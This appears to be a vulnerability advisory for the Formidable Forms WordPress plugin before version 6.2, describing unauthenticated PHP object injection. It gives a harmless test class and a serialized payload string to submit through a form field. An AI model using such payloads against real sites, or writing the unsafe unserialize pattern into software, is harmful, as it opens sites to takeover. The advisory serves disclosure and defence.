Lucene search

K
wpexploitNguyen Huu DoWPEX-ID:8C727A31-FF65-4472-8191-B1BECC08192A
HistoryApr 06, 2023 - 12:00 a.m.

Formidable Forms < 6.2 - Unauthenticated PHP Object Injection

2023-04-0600:00:00
Nguyen Huu Do
162
formidable forms
unauthenticated
php object injection
plugin
gadget chain
arbitrary deserialization
security vulnerability

EPSS

0.001

Percentile

17.8%

The plugin unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

1. Active this plugin and create a simple form.
2. Embed form in existing page.
3. Use anonymous user to fill in the text field with O:4:"Evil":0:{} and submit that form.
4. You will see the "Arbitrary deserialization" result.

EPSS

0.001

Percentile

17.8%

Related for WPEX-ID:8C727A31-FF65-4472-8191-B1BECC08192A